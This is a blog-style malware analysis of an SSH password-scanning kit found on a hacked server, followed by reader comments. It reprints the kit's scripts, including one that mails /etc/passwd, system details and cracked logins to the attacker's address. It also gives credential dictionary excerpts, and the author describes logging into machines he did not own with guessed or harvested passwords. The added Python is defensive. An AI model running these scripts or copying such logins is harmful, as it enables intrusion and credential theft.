Having set up my SSH honeypot, I had my first guest. I thought it might be a victim, so I tried to see whether it had a weak password. It turned out to be really weak: I got it on my second guess. It is an x86 machine running RHEL5 with a public IP address in Beijing. A quick glance at the running processes showed no obvious malicious processes. The bash history showed that the most recent command was go.sh.
   68  cd /root/
   69  ls
   70  cd lamp-auto
   71  ls
   72  sh lamp-auto.sh
   73  cd
   74  cd /root/gosh
   75  ./go.sh 91
I don't know why the hacker didn't clear the history, but I'm certain that the hacker was the most recent logged-in user before me. The lastlog showed that the previous login came from SC Aries Networks Group SRL (Romania). I believe this was the hacker; it's unlikely he planted a fake lastlog entry. I tried to access that address, but it was offline.
OK, let's see what's in /root/gosh.
   [root@foo gosh]$ ls -al
   total 9500
   drwx--x--x   2 root root    4096 Jan 11 14:09 .
   drwxrwxr-x. 10 root root    4096 Jan 11 21:50 ..
   -rwx--x--x   1 root root 3346659 Jul 23  2006 1
   -rwx--x--x   1 root root   54703 Apr 20  2008 2
   -rwx--x--x   1 root root   28956 Apr 21  2008 3
   -rwx--x--x   1 root root   54703 Apr 20  2008 4
   -rwx--x--x   1 root root   26857 Aug 23  2005 5
   -rwx--x--x   1 root root    1227 Jul 12  2011 a
   -rw-r--r--   1 root root 2830095 Jan 11 16:40 bios.txt
   -rwx--x--x   1 root root   22354 Dec  2  2004 common
   -rwx--x--x   1 root root     265 Nov 25  2004 gen-pass.sh
   -rwx--x--x   1 root root     120 Jul 30  2011 go.sh
   -rwx--x--x   1 root root 1972243 Jan 11 16:40 mfu.txt
   -rwx--x--x   1 root root     806 Jun 24  2012 pass_file
   -rwx--x--x   1 root root   21407 Jul 22  2004 pscan2
   -rwx--x--x   1 root root    5908 Jul 12  2011 scam
   -rwx--x--x   1 root root     197 Aug 23  2005 secure
   -rwx--x--x   1 root root  453972 Jul 13  2004 ss
   -rwx--x--x   1 root root  842736 Nov 24  2004 ssh-scan
   -rwxr-xr-x   1 root root   10974 Jan 11 16:59 vuln.txt
   [root@foo gosh]$ file *
   1:           C++ source, ISO-8859 text, with CRLF line terminators
   2:           C source, ASCII text
   3:           C++ source, ASCII text, with CRLF line terminators
   4:           C source, ASCII text
   5:           ASCII text
   a:           ISO-8859 text
   bios.txt:    ASCII text
   common:      C++ source, ASCII text
   gen-pass.sh: Bourne-Again shell script, ASCII text executable
   go.sh:       ASCII text
   mfu.txt:     ASCII text
   pass_file:   ASCII text
   pscan2:      ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.2.5, not stripped
   scam:        Bourne-Again shell script, ASCII text executable
   secure:      Bourne-Again shell script, ASCII text executable
   ss:          ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.0.0, stripped
   ssh-scan:    ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.0.0, stripped
   vuln.txt:    ASCII text
The files 1 to 5 and pass_file are lists of username and password pairs (the "C source" labels are just file(1)'s text heuristic misfiring on them). Those are password dictionaries, no surprise, except for two interesting long passwords, 7hur@y@t3am$#@!(*( and JFKGHDj3587561346tyhsdfgDFH75q4yeatHADF. Google gives a few hits for them, but nothing interesting. bios.txt is a list of 205763 IP addresses, including mine. No wonder I was scanned. go.sh is the script from the bash history:
   perl pscan3
   ./ss 22 -a $1 -i eth0 -s 10
   cat bios.txt |sort | uniq > mfu.txt
   ./ssh-scan 300
   rm -f bios.txt
   rm -rf pscan3
There is no file named pscan3, so I don't know what the first line means; the last line deletes it again. The rest is the actual pipeline: ss scans the given /8 for port 22 and apparently writes its hits to bios.txt (nothing else in the script produces that file), the list is de-duplicated into mfu.txt, and ssh-scan then works through it. Since bios.txt is still present although go.sh ends by deleting it, the run evidently never reached the end. pscan2 is an ELF32 executable. Its help message is:
Usage: ./pscan2 <b-block> <port> [c-block]
Other strings from the executable are:
   %s.pscan.%s
   %s.%s.pscan.%s
   Invalid b-range.
   # scanning: %s.%d.* (total: %d) (%.1f%% done)
   Unable to allocate socket.
   Unable to set O_NONBLOCK
   %s.%d.%d
   Invalid IP.
   # pscan completed in %u seconds. (found %d ips)
   Y@%s
   Error: %s
So it's a port scanner; the %s.pscan.%s format string is the name of its result file, which the a script below reads as $1.pscan.22. Nothing fun. Let's move to ss. Its help message is:
   usage: ./ss <port> [-a <a class> | -b <b class>] [-i <interface] [-s <speed>]
   speed 10 -> as fast as possible, 1 -> it will take bloody ages (about 50 syns/s)
The hacker's command was ./ss 22 -a 91 -i eth0 -s 10, i.e. the whole of 91.0.0.0/8 on port 22 at the fastest setting, so he's an impatient person. From the strings in the executable, it looks like another port scanner: it sends SYNs and uses libpcap to pick up the replies. The pcap filter (found in the strings dump) is (tcp[tcpflags]=0x12) and (src port %d) and (dst port %d), which selects SYN|ACK packets (0x12 = SYN 0x02 | ACK 0x10) coming back from the scanned port to the scanner's own source port, i.e. exactly the hosts with the port open. Googling its SHA-1 b45ae5d8d3069ee7f880dd461c931fa711b6ad3d gives a VirusTotal report with a detection ratio of 30/46, so it's quite well known.
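To make the filter concrete, here is an added example (not code from ss or from the original post) that applies the same three-clause filter in Python to a constructed pcap: it walks the libpcap record headers, parses the Ethernet, IPv4 and TCP headers by hand, tests byte 13 of the TCP header against 0x12, and keeps only replies from the scanned port to the scanner's source port. The result is the set of addresses a SYN scanner would record as open. All addresses, ports and frames are constructed; the source port 40000 stands in for whatever ss actually used.

```python
"""Python equivalent of the libpcap filter found in ss:
    (tcp[tcpflags]=0x12) and (src port %d) and (dst port %d)
Added illustration, not code from the gosh kit. Packets are constructed inline."""
import ipaddress
import struct

TCP_FLAGS_OFFSET = 13   # tcp[tcpflags] is byte 13 of the TCP header
SYN_ACK = 0x12          # ACK (0x10) | SYN (0x02)


def build_frame(src_ip, dst_ip, src_port, dst_port, flags):
    """Ethernet/IPv4/TCP frame with the given TCP flags (constructed test data)."""
    tcp = struct.pack("!HHIIBBHHH", src_port, dst_port, 0, 1,
                      5 << 4,            # data offset 5 words, no options
                      flags, 65535, 0, 0)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0, 64,
                     6,                  # protocol 6 = TCP
                     0,
                     ipaddress.IPv4Address(src_ip).packed,
                     ipaddress.IPv4Address(dst_ip).packed)
    eth = b"\x00" * 12 + b"\x08\x00"     # dummy MACs, ethertype IPv4
    return eth + ip + tcp


def build_pcap(frames):
    """Minimal libpcap file: 24-byte global header, then one record per frame."""
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)  # linktype 1 = Ethernet
    for ts, frame in enumerate(frames):
        out += struct.pack("<IIII", ts, 0, len(frame), len(frame)) + frame
    return out


def passes_ss_filter(frame, scan_port, my_port):
    """True iff the frame is a SYN/ACK from scan_port to my_port, as ss's filter demands."""
    if frame[12:14] != b"\x08\x00":      # not IPv4
        return False
    ip = frame[14:]
    ihl = (ip[0] & 0x0F) * 4
    if ip[9] != 6:                       # not TCP
        return False
    tcp = ip[ihl:]
    src_port, dst_port = struct.unpack("!HH", tcp[:4])
    return (tcp[TCP_FLAGS_OFFSET] == SYN_ACK
            and src_port == scan_port and dst_port == my_port)


def open_hosts(pcap_bytes, scan_port, my_port):
    """Addresses that answered SYN/ACK: the set a SYN scanner would write out."""
    hosts = set()
    pos = 24                             # skip the global header
    while pos + 16 <= len(pcap_bytes):
        _, _, incl_len, _ = struct.unpack("<IIII", pcap_bytes[pos:pos + 16])
        frame = pcap_bytes[pos + 16:pos + 16 + incl_len]
        pos += 16 + incl_len
        if passes_ss_filter(frame, scan_port, my_port):
            hosts.add(str(ipaddress.IPv4Address(frame[26:30])))  # IPv4 source address
    return sorted(hosts)


# Constructed capture: one open host, one closed (RST/ACK), one reply from the
# wrong port, and a duplicate SYN/ACK that must not be counted twice.
SCANNER = "10.0.0.1"
MY_PORT = 40000
CAPTURE = build_pcap([
    build_frame("91.1.2.3", SCANNER, 22, MY_PORT, 0x12),
    build_frame("91.1.2.4", SCANNER, 22, MY_PORT, 0x14),
    build_frame("91.1.2.5", SCANNER, 80, MY_PORT, 0x12),
    build_frame("91.1.2.3", SCANNER, 22, MY_PORT, 0x12),
])

if __name__ == "__main__":
    print(open_hosts(CAPTURE, 22, MY_PORT))   # ['91.1.2.3']
```

Only the SYN/ACK from port 22 survives; a RST/ACK (0x14) from a closed port or a SYN/ACK from the wrong port is dropped by the same test ss compiles into libpcap.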
OK, the last ELF file, ssh-scan. There isn't any useful help message this time. From the strings, it looks like an SSH scanner. My guess: it reads IP addresses from mfu.txt and user:password pairs from pass_file, and writes successful logins to vuln.txt. All file names are hard-coded. I tried a few hosts from vuln.txt; some could be logged into. ssh-scan's SHA-1 4f64a5b07b0c128771ea21bf4aa15610fc6b071c also gets a hit on VirusTotal, with a 30/42 detection ratio.
The shell script scam collects system information, mails it and the scan results to the hacker, and then drives the a script over every /16 of the given /8:
   #!/bin/bash
   echo "[+] [+] [+] RK [+] [+] [+]" >> info2
   echo "[+] [+] [+] IP [+] [+] [+]" >> info2
   /sbin/ifconfig -a >> info2
   echo "[+] [+] [+] uptime [+] [+] [+]" >> info2
   uptime >> info2
   echo "[+] [+] [+] uname -a [+] [+] [+]" >> info2
   uname -a >> info2
   echo "[+] [+] [+] /etc/issue [+] [+] [+]" >> info2
   cat /etc/issue >> info2
   echo "[+] [+] [+] passwd [+] [+] [+]" >> info2
   cat /etc/passwd >> info2
   echo "[+] [+] [+] id [+] [+] [+]" >> info2
   id >> info2
   echo "[+] [+] [+] Spatiu Hdd / pwd [+] [+] [+]" >> info2   # "Spatiu Hdd" = disk space
   df -h >> info2
   pwd >> info2
   # Subject translates to: Scanner MaLa Port : ?? | Pass : you know :))
   cat info2 | mail -s "Scanner MaLa Port : ?? | Pass : stii tu :))" DaNioN@bk.ru
   rm -rf info2
   clear
   echo "####################################################################"
   echo "# ______ "
   echo "# .-. .-. "
   echo "# / \ "
   echo "# | zRR | "
   echo "# |, .-. .-. ,| "
   echo "# | )(z_/ \z_)( | "
   echo "# |/ /\ \| "
   echo "# _ (_ ^^ _) "
   echo "# _\ ____) \_______\__|IIIIII|__/_________________________ "
   echo "# (_)[___]{}<________|-\IIIIII/-|__zRR__zRR__zRR___________\ "
   echo "# / )_/ \ / "
   echo "# \ ______ / "
   echo "# SCANER PRIVAT "                                   # "private scanner"
   echo "# SCANER FOLOSIT DOAR DE TEAMUL MaLaSorTe "          # "scanner used only by the MaLaSorTe team"
   echo "# SACNERUL CONTINE UN PASS_FLIE DE 3MEGA !! "        # "the scanner contains a 3 MB pass_file !!"
   echo "####################################################################"
   if [ -f a ]; then
       # mail the logins found so far, then run a over every /16 of the /8 given as $1
       cat vuln.txt |mail -s "gosh" DaNioN@bk.ru
       ./a $1.0
       ./a $1.1
       ./a $1.2
       ./a $1.3
       ./a $1.4
       ./a $1.5
       ./a $1.6
       ./a $1.7
       ./a $1.8
       ./a $1.9
       ./a $1.10
       cat vuln.txt |mail -s "gosh" DaNioN@bk.ru
       ./a $1.11
       ...
       ./a $1.255
       killall -9 a
   else
       # The "#" begins a shell comment, so these three lines echo nothing but a newline.
       # Intended text: "Strange .. you didn't follow the instructions",
       # "you should have done mv assh a or mv scan a", "whatever you have ... dohh .."
       echo # Ciudat ..Nu Ai Urmat Instructiunile #
       echo # trebui dat mv assh a sau mv scan a #
       echo # orice ai avea tu ... dohh .. #
       killall -9 a
       killall -9 pscan2
   fi
I can't see any trace of this script having been executed on this host. Google Translate says the comments are Romanian, but the hacker might not be the script's author. Nevertheless, the language and the IP address match! The hacker's email is DaNioN@bk.ru, which has only one Google hit. The script ./a prepares the input for ssh-scan and launches it:
   #!/bin/bash
   if [ $# != 1 ]; then
       echo " usage: $0 <b class>"
       exit;
   fi
   echo -e "\033[1;31m?\033[1;32m Created bY zRR \033[1;31m?\033[0m"
   echo "INCERC SA DAU VIATZA CIBERNETICI"          # "trying to bring cybernetics to life"
   ./pscan2 $1 22                                    # writes $1.pscan.22 (the %s.pscan.%s string)
   sleep 10
   cat $1.pscan.22 |sort |uniq > mfu.txt
   oopsnr2=`grep -c . mfu.txt`                       # host count; never used afterwards
   echo "# SA VEDEM CE PULA MEA FACEM"               # (vulgar) "let's see what the hell we're doing"
   echo "# _\ ____) \_______ "
   echo "# (_)[_bY_]{}<zRR> "
   echo "# / )_/ "
   echo "#.......si DE root ....... "                # "....... and FOR root ......."
   echo " "
   # Each dictionary 1..5 is copied over the hard-coded pass_file and ssh-scan is re-run
   echo -e "Checking\033[1;34m user file\033[0m pass 1"
   cp 1 pass_file
   ./ssh-scan 100
   sleep 3
   echo -e "Checking\033[1;31m root file\033[0m pass 2"
   cp 2 pass_file
   ./ssh-scan 100
   sleep 3
   echo -e "Checking\033[1;34m user file\033[0m pass 3"
   cp 3 pass_file
   ./ssh-scan 100
   sleep 3
   echo -e "Checking\033[1;34m user file\033[0m pass 4"
   cp 4 pass_file
   ./ssh-scan 100
   sleep 3
   echo -e "Checking\033[1;31m root file\033[0m pass 5"
   cp 5 pass_file
   ./ssh-scan 100
   rm -rf $1.pscan.22 mfu.txt
   echo -e "\033[1;31m?\033[1;32mFuck .. continuam .. \033[1;31m?\033[0m"   # "we continue"
It even has terminal color. That’s quite uncommon for a background scanning tool. The hacker can’t sit there and watch the scanning, so what’s the purpose?
To conclude, this is a simple SSH password scanner. It's simple in the sense that it doesn't propagate itself: the hacker has to install and launch it manually on each newly acquired host.
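As an added example (not part of the kit or of the original post), the following Python script turns the indicators collected above into a quick sweep of a host: the two SHA-1s submitted to VirusTotal, the file names hard-coded in go.sh, a and scam, the %s.pscan.%s result-file pattern of pscan2, and distinctive strings such as the pcap filter, the mail subject and the operator's address. demo() builds a throw-away directory with constructed stand-ins and scans it; the stand-in for ss naturally does not carry the real hash, so its own digest is registered for the demonstration only.

```python
"""Sweep a directory tree for traces of the gosh SSH-scanner kit.
Added example; indicators come from the analysis above, the demo data is constructed."""
import hashlib
import os
import re
import tempfile

# SHA-1s reported for the two binaries in the kit
KNOWN_SHA1 = {
    "b45ae5d8d3069ee7f880dd461c931fa711b6ad3d": "ss (SYN scanner)",
    "4f64a5b07b0c128771ea21bf4aa15610fc6b071c": "ssh-scan (SSH brute forcer)",
}
# File names hard-coded in go.sh, a and scam. "ss", "a", "common" and "secure"
# are left out: too generic to flag on name alone (ss is also iproute2's tool).
ARTIFACT_NAMES = {"bios.txt", "mfu.txt", "vuln.txt", "pass_file", "gen-pass.sh",
                  "ssh-scan", "pscan2", "go.sh", "scam"}
# pscan2 writes "%s.pscan.%s" / "%s.%s.pscan.%s", e.g. 91.pscan.22
PSCAN_OUTPUT = re.compile(r"^\d{1,3}(\.\d{1,3})?\.pscan\.\d+$")
MARKER_STRINGS = [
    b"(tcp[tcpflags]=0x12) and (src port %d) and (dst port %d)",
    b"# pscan completed in %u seconds. (found %d ips)",
    b"Scanner MaLa Port",
    b"TEAMUL MaLaSorTe",
    b"DaNioN@bk.ru",
]
MAX_READ = 16 * 1024 * 1024   # string search is limited to the first 16 MiB


def sha1_of(path):
    h = hashlib.sha1()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def scan_tree(root, known_sha1=KNOWN_SHA1):
    """Return (path, reason) pairs for every indicator found under root."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if os.path.islink(path):
                continue
            if name in ARTIFACT_NAMES:
                hits.append((path, f"kit file name: {name}"))
            if PSCAN_OUTPUT.match(name):
                hits.append((path, "pscan2 output file"))
            try:
                digest = sha1_of(path)
                with open(path, "rb") as f:
                    data = f.read(MAX_READ)
            except OSError:
                continue
            if digest in known_sha1:
                hits.append((path, f"SHA-1 matches {known_sha1[digest]}"))
            for marker in MARKER_STRINGS:
                if marker in data:
                    hits.append((path, f"contains {marker.decode()!r}"))
    return hits


def demo():
    """Constructed stand-in for /root/gosh; returns the hits found in it."""
    root = tempfile.mkdtemp(prefix="gosh-demo-")
    with open(os.path.join(root, "vuln.txt"), "w") as f:
        f.write("constructed sample, no real hosts\n")
    with open(os.path.join(root, "91.pscan.22"), "w") as f:
        f.write("91.0.0.1\n")
    with open(os.path.join(root, "mailer.sh"), "wb") as f:   # stand-in for scam
        f.write(b'#!/bin/bash\ncat info2 | mail -s "Scanner MaLa Port : ??" DaNioN@bk.ru\n')
    fake_ss = os.path.join(root, "ss")
    with open(fake_ss, "wb") as f:
        f.write(b"\x7fELF constructed stand-in, not the real binary")
    # The stand-in cannot have the real hash; register its own digest for the demo.
    known = dict(KNOWN_SHA1, **{sha1_of(fake_ss): "ss (constructed stand-in)"})
    return scan_tree(root, known)


if __name__ == "__main__":
    for path, reason in demo():
        print(f"{reason:45s} {path}")
```

On a real host you would run scan_tree over / with the stock KNOWN_SHA1; the string and file-name checks still catch recompiled or renamed copies that the hashes miss, at the cost of occasional false positives that need a look by hand.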
2013/01/25 at 4:47 am
FYI, the language in the comments is indeed Romanian (with typos!), but the comments are (partially) guidance/help, almost like it was designed by someone and run by other people (less skilled). Maybe this is why it has nice output, as it was custom made (and the hacker wanted to look nice to the client)?
2013/01/25 at 2:05 pm
Hi Iustin,
So this guy seems like a script kiddie. Given that the script is not publicly available (at least I can’t find any), there must be some Romanian underground community developing/distributing the tools.
2014/01/31 at 9:14 am
It is a script kiddie ... many so-called Teams modify this to look cool :) ... you can find these guys on the UnderNet IRC server.
MaLaSorTe is ~Cayte@119.161.132.197 * Keely
MaLaSorTe using *.undernet.org The Undernet Underworld
MaLaSorTe has been idle 2hrs 15mins 57secs, signed on Fri Jan 31 00:54:07
MaLaSorTe End of /WHOIS list.
This is just one of the SSH password scanners .....
2013/06/25 at 11:25 pm
fuck you is now work anything teach me lol i want to teach how scanner videos
2014/02/16 at 4:02 pm
Hey man, so glad to have found this! Just hit by the same guy, same “gosh” file. Got some other interesting stuff he left behind if you’re interested
2014/02/17 at 1:21 pm
Thanks for sharing. Probably a different guy with the same tool. If you think there is something interesting/helpful, you can post it here.
2014/03/21 at 5:53 pm
I just got hit with this same toolchain. Attackers entered through open ssh to postgres with defaults still enabled (including password). I know. I know. Anywho, they installed a counterstrike 1.6 server.
Kids these days.